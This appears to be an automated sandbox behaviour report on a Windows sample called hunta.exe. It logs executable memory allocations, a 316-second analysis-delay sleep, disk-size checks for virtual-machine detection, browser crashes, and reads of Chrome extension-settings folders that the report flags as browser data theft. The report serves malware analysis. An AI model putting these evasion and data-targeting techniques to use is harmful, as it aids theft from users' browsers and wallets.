NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:39 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a02000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02df0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 region_size: 5246976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

hunta.exe tried to sleep 316 seconds, actually delayed analysis time by 316 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (13 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 10, 2024, 2:38 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (15 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2088 crashed
Application Crash	Process chrome.exe with pid 3068 crashed
Application Crash	Process chrome.exe with pid 1892 crashed
Application Crash	Process chrome.exe with pid 1736 crashed
Application Crash	Process firefox.exe with pid 2796 crashed
Application Crash	Process firefox.exe with pid 1168 crashed
Application Crash	Process firefox.exe with pid 2176 crashed
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 101969456 registers.edi: 83507068 registers.eax: 101969456 registers.ebp: 101969536 registers.edx: 116 registers.ebx: 101969820 registers.esi: 2147746133 registers.ecx: 4523000	1	0	0
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7165540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716552ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x71730ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 63953416 registers.edi: 1953561104 registers.eax: 63953416 registers.ebp: 63953496 registers.edx: 1 registers.ebx: 4218724 registers.esi: 2147746133 registers.ecx: 1410556809	1	0	0
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: 0x5b2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5b2e04 registers.r14: 184216672 registers.r15: 184217112 registers.rcx: 1432 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 79646064 registers.rsp: 184215848 registers.r11: 184220368 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1428 registers.r12: 32486608 registers.rbp: 184215984 registers.rdi: 32486352 registers.rax: 5975552 registers.r13: 184216544	1	0	0
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 190311808 registers.r15: 190312248 registers.rcx: 1532 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 78435808 registers.rsp: 190310968 registers.r11: 190315504 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1556 registers.r12: 32159008 registers.rbp: 190311120 registers.rdi: 31896256 registers.rax: 5910016 registers.r13: 190311680	1	0	0
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: 0x3a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x3a2e04 registers.r14: 185397040 registers.r15: 185397480 registers.rcx: 1344 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 51246464 registers.rsp: 185396216 registers.r11: 185400736 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1388 registers.r12: 34911504 registers.rbp: 185396352 registers.rdi: 34648752 registers.rax: 3812864 registers.r13: 185396912	1	0	0
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 10350712 registers.r15: 8791498856048 registers.rcx: 48 registers.rsi: 8791498787712 registers.r10: 0 registers.rbx: 0 registers.rsp: 10350344 registers.r11: 10353728 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 14910064 registers.rbp: 10350464 registers.rdi: 67223072 registers.rax: 13442816 registers.r13: 10351304	1	0	0
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 10090176 registers.r15: 10089680 registers.rcx: 48 registers.rsi: 14704704 registers.r10: 0 registers.rbx: 0 registers.rsp: 10088728 registers.r11: 10090928 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 10089511 registers.rbp: 10088848 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ Feb. 10, 2024, 2:39 p.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 9697056 registers.r15: 9696560 registers.rcx: 48 registers.rsi: 14704992 registers.r10: 0 registers.rbx: 0 registers.rsp: 9695608 registers.r11: 9697808 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 9696391 registers.rbp: 9695728 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0

Steals private information from local Internet browsers (50 out of 2326 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-65C769C3-764.pma
